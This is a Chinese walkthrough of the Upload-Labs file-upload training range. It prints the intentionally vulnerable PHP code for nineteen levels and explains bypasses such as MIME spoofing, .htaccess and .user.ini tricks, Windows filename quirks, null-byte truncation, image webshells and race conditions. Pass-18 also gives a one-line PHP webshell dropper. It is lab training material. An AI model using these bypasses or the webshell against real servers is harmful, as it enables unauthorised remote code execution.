前期准备

如果是在本地自己配置的话，参考这篇文章：https://yongz.fun/posts/addf7c27.html
总体来说还是比较麻烦的，可以直接下载作者配置好的环境：https://github.com/c0ny1/upload-labs/releases，但是作者没更新了，环境会少一部分。
这里还是采用 Windows + PhpStudy 进行搭建，因为靶场中有很多都与 Windows 特性有关，遇到 Linux 场景再做演示。

Upload-Labs

Pass-01（白名单 | 前端校验）

漏洞源码如下：

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    var allow_ext = ".jpg|.png|.gif";
    var ext_name = file.substring(file.lastIndexOf("."));
    if (allow_ext.indexOf(ext_name) == -1) {
        var errMsg = "该文件不允许上传，请上传" + allow_ext + "类型的文件,当前文件类型为：" + ext_name;
        alert(errMsg);
        return false;
    }
}

一个很经典的前端 JavaScript 校验脚本，使用白名单判断上传的文件后缀。
不过既然是前端校验，只需要记住一句话：前端校验都是纸老虎。
绕过方式：
- F12 修改页面源代码，但有限制（Chrome 不行，firebug 可以）；
- 关闭网页的 JavaScript 脚本，但此方法很可能会导致页面无法提交数据；
- 先上传一次正常文件，使用 BurpSuite 修改 HTTP 请求中的文件后缀即可；
- 先上传一次正常文件，使用 BurpSuite 修改 HTTP 响应包中的 JavaScript 脚本。

Pass-02（白名单 | MIME 校验）

漏洞源码如下：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '文件类型不正确，请重新上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

使用白名单判断文件的 MIME 类型，只允许上传三类文件：

1
2
3

$_FILES['upload_file']['type'] == 'image/jpeg'
$_FILES['upload_file']['type'] == 'image/png'
$_FILES['upload_file']['type'] == 'image/gif'

但是需要注意一点，对于 $_FILES[]['type'] 来说，这里的 MIME 类似是从前端获取的，这就产生了漏洞。
绕过方式：
- 可以上传一个 JPG 文件，通过 BurpSuite 抓包修改文件后缀，这样 MIME 类型正确，即可以骗过后端验证进行上传。
- 可以上传一个 PHP 文件，通过 BurpSuite 抓包修改 Content-Type，这样 MIME 类型正确，即可以骗过后端验证进行上传。

Pass-03（黑名单 | 文件解析类型）

漏洞源码如下：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp', '.aspx', '.php', '.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext);
        $file_ext = str_ireplace('::$DATA', '', $file_ext);
        $file_ext = trim($file_ext);

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . date("YmdHis") . rand(1000, 9999) . $file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

使用黑名单判断文件的扩展名是否为脚本扩展名，并且总体限制比较死。
不过既然是黑名单，那就有很多的利用空间了，是否上传相似的后缀，对方服务器也会进行解析呢？
绕过方式：
- 上传类似 .phtml .php5 .php3 .php4 后缀的文件，查看对方是否进行解析。

Pass-04（黑名单 | .htaccess）

漏洞源码如下：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php", ".php5", ".php4", ".php3", ".php2", ".php1", ".html", ".htm", ".phtml", ".pht", ".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2", ".pHp1", ".Html", ".Htm", ".pHtml", ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml", ".jSp", ".jSpx", ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml", ".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".cer", ".aSp", ".aSpx", ".aSa", ".aSax", ".aScx", ".aShx", ".aSmx", ".cEr", ".sWf", ".swf", ".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext);
        $file_ext = str_ireplace('::$DATA', '', $file_ext);
        $file_ext = trim($file_ext);

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

使用黑名单判断文件的扩展名是否为脚本扩展名，并且总体限制比较死，把大部分可能的后缀排除了。
不过既然是黑名单，那就有很多的利用空间了，可以在浏览器进行抓包看见对方的服务器信息：

1	Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17

对方 Web 服务器使用的是 Apache 作为中间件，而在 Apache 中有个特殊的配置文件：.htaccess
.htaccess 文件可以实现很多特殊功能，其中一个功能可以修改扩展名的解析方式：
在这种情况下我们只需要上传一个图片马以及上述 .htaccess 文件，即可通过 WebShell 控制服务器。
绕过方式：
- 先将带有木马的 PHP 文件后缀修改为 jpg，之后再上传 .htaccess 文件即可。

Pass-05（黑名单 | .user.ini）

漏洞源码如下：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php", ".php5", ".php4", ".php3", ".php2", ".html", ".htm", ".phtml", ".pht", ".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2", ".Html", ".Htm", ".pHtml", ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml", ".jSp", ".jSpx", ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml", ".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".cer", ".aSp", ".aSpx", ".aSa", ".aSax", ".aScx", ".aShx", ".aSmx", ".cEr", ".sWf", ".swf", ".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext);
        $file_ext = str_ireplace('::$DATA', '', $file_ext);
        $file_ext = trim($file_ext);

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

使用黑名单判断文件的扩展名是否为脚本扩展名，并且总体限制比较死，把大部分可能的后缀排除了，连同 .htaccess 。
通过 URL 可以知道对方 Web 服务器使用的是 PHP 脚本，而在 PHP 中也有一个类似 Apache 的配置文件：.user.ini
.user.ini 文件可以实现很多特殊功能，其中一个功能可以自动包含文件：

1 2	auto_append_file = 1.jpg auto_prepend_file = 2.jpg

在这种情况下我们只需要上传一个图片马以及上述 .user.ini 文件，即可通过 WebShell 控制服务器。
绕过方式：
- 先将带有木马的 PHP 文件后缀修改为 jpg，之后再上传 .user.ini 文件即可（访问 readme.php）。

Pass-06（黑名单 | Win 大小写不敏感）

漏洞源码如下：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php", ".php5", ".php4", ".php3", ".php2", ".html", ".htm", ".phtml", ".pht", ".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2", ".Html", ".Htm", ".pHtml", ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml", ".jSp", ".jSpx", ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml", ".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".cer", ".aSp", ".aSpx", ".aSa", ".aSax", ".aScx", ".aShx", ".aSmx", ".cEr", ".sWf", ".swf", ".htaccess", ".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);
        $file_ext = trim($file_ext);

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . date("YmdHis") . rand(1000, 9999) . $file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

使用黑名单判断文件的扩展名是否为脚本扩展名，并且总体限制比较死，把大部分可能的后缀排除了，连同 .htaccess/.user.ini 。
不过和之前不同的是，少了一个函数 strtolower，用于将文件后缀变成小写。
那就意味着可以使用大小写的方式进行绕过，但是此方法只适用于 Windows 系统。
绕过方式：
- 可以上传一个后缀 .php 的文件，通过 BurpSuite 抓包修改后缀为 Php ，即可以绕过后端验证进行上传。

Pass-07（黑名单 | Win 文件加空自动删除）

漏洞源码如下：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php", ".php5", ".php4", ".php3", ".php2", ".html", ".htm", ".phtml", ".pht", ".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2", ".Html", ".Htm", ".pHtml", ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml", ".jSp", ".jSpx", ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml", ".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".cer", ".aSp", ".aSpx", ".aSa", ".aSax", ".aScx", ".aShx", ".aSmx", ".cEr", ".sWf", ".swf", ".htaccess", ".ini");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext);
        $file_ext = str_ireplace('::$DATA', '', $file_ext);

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . date("YmdHis") . rand(1000, 9999) . $file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

使用黑名单判断文件的扩展名是否为脚本扩展名，并且总体限制比较死，把大部分可能的后缀排除了，连同 .htaccess/.user.ini 。
这里把 strtolower 又加上了，但是又少了一个关键函数 trim 用于去除字符串两端空白字符。
那就意味着可以使用尾部加空的方式进行绕过，但是此方法只适用于 Windows 系统。
绕过方式：
- 可以上传一个后缀 .php 的文件，通过 BurpSuite 抓包修改后缀为 .php空格 ，即可以绕过后端验证进行上传。

Pass-08（黑名单 | Win 文件加点自动删除）

漏洞源码如下：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php", ".php5", ".php4", ".php3", ".php2", ".html", ".htm", ".phtml", ".pht", ".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2", ".Html", ".Htm", ".pHtml", ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml", ".jSp", ".jSpx", ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml", ".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".cer", ".aSp", ".aSpx", ".aSa", ".aSax", ".aScx", ".aShx", ".aSmx", ".cEr", ".sWf", ".swf", ".htaccess", ".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext);
        $file_ext = str_ireplace('::$DATA', '', $file_ext);
        $file_ext = trim($file_ext);

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

使用黑名单判断文件的扩展名是否为脚本扩展名，并且总体限制比较死，把大部分可能的后缀排除了，连同 .htaccess/.user.ini 。
这里把 trim 又加上了，但是又少了一个关键函数 deldot 这是做什么的？追踪一下：

<?php
function deldot($s){
    for ($i = strlen($s) - 1; $i > 0; $i--) {
        if ($c != '.') {
            return substr($s, 0, $i + 1);
        }
    }
}

作用是去除文件末尾的点，那就意味着可以使用尾部加点的方式进行绕过，但是此方法只适用于 Windows 系统。
绕过方式：
- 可以上传一个后缀 .php 的文件，通过 BurpSuite 抓包修改后缀为 .php. ，即可以绕过后端验证进行上传。

Pass-09（黑名单 | Win ::$DATA）

漏洞源码如下：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php", ".php5", ".php4", ".php3", ".php2", ".html", ".htm", ".phtml", ".pht", ".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2", ".Html", ".Htm", ".pHtml", ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml", ".jSp", ".jSpx", ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml", ".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".cer", ".aSp", ".aSpx", ".aSa", ".aSax", ".aScx", ".aShx", ".aSmx", ".cEr", ".sWf", ".swf", ".htaccess", ".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext);
        $file_ext = trim($file_ext);

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . date("YmdHis") . rand(1000, 9999) . $file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

使用黑名单判断文件的扩展名是否为脚本扩展名，并且总体限制比较死，把大部分可能的后缀排除了，连同 .htaccess/.user.ini 。
这里把 deldot 又加上了，但是又少了一个关键函数 str_ireplace 替换掉了 ::$DATA，这是什么？
- ::$DATA 是 Windows 系统中用于存储文件实际数据的隐藏属性，它对于普通用户来说是透明的，只有系统和特定程序才能访问和使用它。
那就意味着可以保存文件时 ::$DATA 会自动被去除，但是此方法只适用于 Windows 系统。
绕过方式：
- 可以上传一个后缀 .php 的文件，通过 BurpSuite 抓包修改后缀为 .php::$DATA ，即可以绕过后端验证进行上传。

Pass-10（黑名单 | Win 点+空格+点）

漏洞源码如下：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php", ".php5", ".php4", ".php3", ".php2", ".html", ".htm", ".phtml", ".pht", ".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2", ".Html", ".Htm", ".pHtml", ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml", ".jSp", ".jSpx", ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml", ".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".cer", ".aSp", ".aSpx", ".aSa", ".aSax", ".aScx", ".aShx", ".aSmx", ".cEr", ".sWf", ".swf", ".htaccess", ".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext);
        $file_ext = str_ireplace('::$DATA', '', $file_ext);
        $file_ext = trim($file_ext);

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

使用黑名单判断文件的扩展名是否为脚本扩展名，并且总体限制比较死，把大部分可能的后缀排除了，连同 .htaccess/.user.ini 。
现在看上去好像没招了，再回过头看看 deldot 函数：

<?php
function deldot($s){
    for ($i = strlen($s) - 1; $i > 0; $i--) {
        $c = substr($s, $i, 1);
        if ($c != '.') {
            return substr($s, 0, $i + 1);
        }
    }
}

琢磨琢磨，发现它的作用是删除字符串末尾的点.字符，只要文件的末尾不是点他就会直接将后缀返回。但这里为了解析文件，需要以空格结尾，不过空格会被直接消除，所以变成 .空格. 的拼接
绕过方式：
- 可以上传一个后缀 .php 的文件，通过 BurpSuite 抓包修改后缀为 .php.空格. ，即可以绕过后端验证进行上传。

Pass-11（黑名单 | 双写）

漏洞源码如下：

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php", "php5", "php4", "php3", "php2", "html", "htm", "phtml", "pht", "jsp", "jspa", "jspx", "jsw", "jsv", "jspf", "jtml", "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer", "swf", "htaccess", "ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext, "", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH . '/' . $file_name;
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

使用黑名单判断文件的扩展名是否为脚本扩展名，并且总体限制比较死，把大部分可能的后缀排除了，连同 .htaccess/.user.ini 。
不过出现了一个函数 str_ireplace 用于在字符串中进行不区分大小写的替换操作，这里的替换相对于直接删除，那就出现了问题。
绕过方式：
- 可以上传一个后缀 .php 的文件，通过 BurpSuite 抓包修改后缀为 .pphphp ，即可以绕过后端验证进行上传。

Pass-12（白名单 | %00 截断 Get）

漏洞源码如下：

if (isset($_POST['submit'])) {
    $ext_arr = array('jpg', 'png', 'gif');
    $file_ext = substr($_FILES['upload_file']['name'], strrpos($_FILES['upload_file']['name'], ".") + 1);
    if (in_array($file_ext, $ext_arr)) {
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path'] . "/" . rand(10, 99) . date("YmdHis") . "." . $file_ext;

        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错！';
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件！";
    }
}

使用白名单判断文件的扩展名是否为图片文件类型，既然是白名单那基本上是无解的。
不过如果使用的是非常非常旧的 PHP 版本，就有可能出现截断绕过的形式：
- PHP Version < 5.3.29
- magic_quotes_gpc = off
当然只有截断还不够，还需要知道文件保存的路径才能成功截断并上传。
绕过方式：
- 可以上传一个后缀 .jpg 的文件，通过 BurpSuite 抓包 save_path 为 1.php%00 ，即可以绕过后端验证进行上传。

Pass-13（白名单 | %00 截断 Post）

漏洞源码如下：

if (isset($_POST['submit'])) {
    $ext_arr = array('jpg', 'png', 'gif');
    $file_ext = substr($_FILES['upload_file']['name'], strrpos($_FILES['upload_file']['name'], ".") + 1);
    if (in_array($file_ext, $ext_arr)) {
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path'] . "/" . rand(10, 99) . date("YmdHis") . "." . $file_ext;

        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件！";
    }
}

使用白名单判断文件的扩展名是否为图片文件类型，既然是白名单那基本上是无解的。
不过如果使用的是非常非常旧的 PHP 版本，就有可能出现截断绕过的形式：
- PHP Version < 5.3.29
- magic_quotes_gpc = off
当然只有截断还不够，还需要知道文件保存的路径才能成功截断并上传。
绕过方式：
- 可以上传一个后缀 .jpg 的文件，通过 BurpSuite 抓包 save_path 为 1.phpurldecode(%00) ，即可以绕过后端验证进行上传。

Pass-14（白名单 | 图片马[2 Byte] + 文件包含）

漏洞源码如下：

if (isset($_POST['submit'])) {
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if ($file_type == 'unknown') {
        $msg = "文件未知，上传失败！";
    } else {
        $img_path = UPLOAD_PATH . "/" . rand(10, 99) . date("YmdHis") . "." . $file_type;
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = "上传出错！";
        }
    }
}

这里单独写了一个 getReailFileType 函数，查看一下函数内容：

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2);
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);
    $typeCode = intval($strInfo['chars1'] . $strInfo['chars2']);
    $fileType = '';
    switch ($typeCode) {
        case 255216:
            $fileType = 'jpg';
            break;
        case 13780:
            $fileType = 'png';
            break;
        case 7173:
            $fileType = 'gif';
            break;
        default:
            $fileType = 'unknown';
    }
    return $fileType;
}

简单概括一下就是读取文件内容的前两个字节放到 switch 中去匹配，本质上还是白名单校验，并且无法修改图片后缀。
所以作者在根目录下保留了一个文件包含漏洞让我们进行文件包含 + 文件上传漏洞的利用。
制作图片马：

1	echo "code" > jpg

绕过方式：
- 可以上传一个图片马，使用文件包含漏洞进行解析。

Pass-15（白名单 | 图片马[getimagesize] + 文件包含）

漏洞源码分析：

if (isset($_POST['submit'])) {
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if (!$res) {
        $msg = "文件未知，上传失败！";
    } else {
        $img_path = UPLOAD_PATH . "/" . rand(10, 99) . date("YmdHis") . $res;
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = "上传出错！";
        }
    }
}

这里单独写了一个 isImage 函数，查看一下函数内容：

function isImage($filename){
    $types = '.jpeg|.png|.gif';
    if (file_exists($filename)) {
        $info = getimagesize($filename);
        $ext = image_type_to_extension($info[2]);
        if (stripos($types, $ext) >= 0) {
            return $ext;
        } else {
            return false;
        }
    } else {
        return false;
    }
}

使用 getimagesize 函数，用于获取图像文件的信息，包括宽度、高度和图像类型等。
那这里和上一关的区别在于，不是一个真正的图片是获取不到图片信息的，不过解题方式还是不变。
绕过方式：
- 可以上传一个图片马，使用文件包含漏洞进行解析。

Pass-16（白名单 | 图片马[exif_inmagetype] + 文件包含）

漏洞源码分析：

if (isset($_POST['submit'])) {
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if (!$res) {
        $msg = "文件未知，上传失败！";
    } else {
        $img_path = UPLOAD_PATH . "/" . rand(10, 99) . date("YmdHis") . "." . $res;
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = "上传出错！";
        }
    }
}

这里单独写了一个 isImage 函数，查看一下函数内容：

function isImage($filename){
    $image_type = exif_imagetype($filename);
    switch ($image_type) {
        case IMAGETYPE_GIF:
            return "gif";
            break;
        case IMAGETYPE_JPEG:
            return "jpg";
            break;
        case IMAGETYPE_PNG:
            return "png";
            break;
        default:
            return false;
            break;
    }
}

使用 exif_imagetype 函数，用于获取图像文件的类型。
那这里和上一关的区别在于，函数发生变化，不过解题方式还是不变。
绕过方式：
- 可以上传一个图片马，使用文件包含漏洞进行解析。

Pass-17（白名单 | 二次渲染）

漏洞源码分析：

if (isset($_POST['submit'])) {
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];
    $target_path = UPLOAD_PATH . '/' . basename($filename);
    $fileext = substr(strrchr($filename, "."), 1);

    if (($fileext == "jpg") && ($filetype == "image/jpeg")) {
        if (move_uploaded_file($tmpname, $target_path)) {
            $im = imagecreatefromjpeg($target_path);
            if ($im == false) {
                $msg = "该文件不是jpg格式的图片！";
                @unlink($target_path);
            } else {
                srand(time());
                $newfilename = strval(rand()) . ".jpg";
                $img_path = UPLOAD_PATH . '/' . $newfilename;
                imagejpeg($im, $img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错！";
        }

    } else if (($fileext == "png") && ($filetype == "image/png")) {
       ......
    } else if (($fileext == "gif") && ($filetype == "image/gif")) {
       ......
    } else {
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件！";
    }
}

代码变得十分冗长，具体依靠一个函数：imagecreatefromjpg、imagecreatefrompng、imagecreatefromgif。
从 JPEG、PNG、GIF 图像文件中读取像素数据，用于创建一个新的图像资源。
之后使用 imagejpeg 用于将图像资源保存为 JPEG 图像文件，覆盖原有上传文件。
这样会导致什么问题呢？如果里面包含 PHP 代码，可能会被压缩删除。
这里就需要使用二次渲染的方式进行绕过了，不同图片有着不同的写入方式，其中 GIF 格式是最简单的。
绕过方式：
- 可以上传一个 GIF 图片，再下载上传的图片，进行对比。
- 在未修改的位置插入 PHP 代码，使用文件包含漏洞进行解析。

Pass-18（白名单 | 条件竞争 + 文件写入）

漏洞源码分析：

if (isset($_POST['submit'])) {
    $ext_arr = array('jpg', 'png', 'gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name, strrpos($file_name, ".") + 1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if (move_uploaded_file($temp_file, $upload_file)) {
        if (in_array($file_ext, $ext_arr)) {
            $img_path = UPLOAD_PATH . '/' . rand(10, 99) . date("YmdHis") . "." . $file_ext;
            rename($upload_file, $img_path);
            $is_upload = true;
        } else {
            $msg = "只允许上传.jpg|.png|.gif类型文件！";
            unlink($upload_file);
        }
    } else {
        $msg = '上传出错！';
    }
}

这关是白名单校验，限制的很死，有同学想到了 %00 截断，但明显不行，因为对方未指定出上传路径。
简单分析一下代码执行顺序：
- 定义文件扩展名；
- 获取文件名称、文件临时地址、文件扩展名；
- 定义文件上传路径；
- 保存文件至 upload 路径中，之后再判断扩展名是否合法；
- 合法就重命名文件，不合法就删除。
这里会导致一个问题，当问上传的速度/量足够大，是可以访问到上传文件的：

1 2	<?php file_put_contents("./shell.php",'<?php eval($_POST["a"]);?>',FILE_APPEND);

绕过方式：
- 使用 BurpSuite 持续上传一个 PHP 写入木马的文件；
- 之后使用 BurpSuite 构造一个爆破该 PHP 的文件的功能即可。

Pass-19（黑名单 | 条件竞争 + Apache 未知后缀解析）

漏洞源码分析：

if (isset($_POST['submit'])) {
    require_once("./myupload.php");
    $imgFileName = time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'], $imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传，但没有重命名。';
            break;
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break;
        case -2:
            $msg = '上传失败，上传目录不可写。';
            break;
        case -3:
            $msg = '上传失败，无法上传该类型文件。';
            break;
        case -4:
            $msg = '上传失败，上传的文件过大。';
            break;
        case -5:
            $msg = '上传失败，服务器已经存在相同名称文件。';
            break;
        case -6:
            $msg = '文件无法上传，文件不能复制到目标目录。';
            break;
        default:
            $msg = '未知错误！';
            break;
    }
}

这关定义了一个 MyUpload 对象，具体内容：

class MyUpload{
    ......
    var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",".html", ".xml", ".tiff", ".jpeg", ".png" );
    function MyUpload( $file_name, $tmp_file_name, $file_size, $file_rename_to = '' ){
        $this->cls_filename = $file_name;
        $this->cls_tmp_filename = $tmp_file_name;
        $this->cls_filesize = $file_size;
        $this->cls_file_rename_to = $file_rename_to;
    }
    ......
    function checkExtension(){
        if (!in_array(strtolower(strrchr($this->cls_filename, ".")), $this->cls_arr_ext_accepted)) {
            return "EXTENSION_FAILURE";
        } else {
            return 1;
        }
    }
    function upload( $dir ){
        $ret = $this->checkExtension();
        if( $ret != 1 ){
          return $this->resultUpload( $ret );
        }
        .......
        $ret = $this->move();
        if( $ret != 1 ){
          return $this->resultUpload( $ret );    
        }
        if( $this->cls_rename_file == 1 ){
          $ret = $this->renameFile();
          if( $ret != 1 ){
            return $this->resultUpload( $ret );    
          }
        }
        .......
    }
    ......
}

看的出来，还是白名单校验，限制的很死，有同学想到了 %00 截断，但明显不行，因为对方未指定出上传路径。
简单分析一下代码执行顺序：
- 判断扩展名是否合法；
- 合法后移动至网站目录；
- 重命名上传文件。
这里会导致一个问题，当问上传的速度/量足够大，是可以访问到上传文件的。
但是访问到了有什么用，前面定义了已经定义了扩展名，不过没有校验文件内容。
绕过方式：
- 使用 BurpSuite 持续上传一个 PHP 写入木马的文件后缀为 .php.7z；
